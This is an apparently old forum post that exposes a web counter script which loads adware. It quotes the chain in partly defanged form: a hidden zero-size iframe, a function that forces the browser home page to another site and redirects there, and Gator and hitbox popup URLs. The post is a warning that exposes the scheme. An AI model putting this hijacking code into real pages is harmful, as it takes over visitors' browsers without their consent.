They're popping gator, regular popups, redirects and tries to change your home page.
I just went to a site that uses it and this is what it looks like...
The page I went to had the counter..
--
<script language="Java*Script" src="http://tgpcounter.freethumbnailgalleries.com/tracker.js"></script>
--
Which includes an i*frame to doodlesurf.com
--
document*write('<i*frame height="0" width="0" src="http://www.doodlesurf.com"></i*frame>')
--
And this is from doodlesurf.com.....
Change the home page
--
function MakeHomePage(strThis){
strThis.style.behavior="url(#default#homepage)";
strThis.setHomePage("http://www.netster.com");
top.location.replace("http://www.netster.com");
}
--
2 popups, Gator and hitbox
--
var URL = "http://webpdp.gator.com/v3/webpdp_v3_detect.php?yic=HIC_NetsterDT";
var URL2 = "http://ai.hitbox.com/ai?hb=DM521008PNDA&ai=AF10225"
--
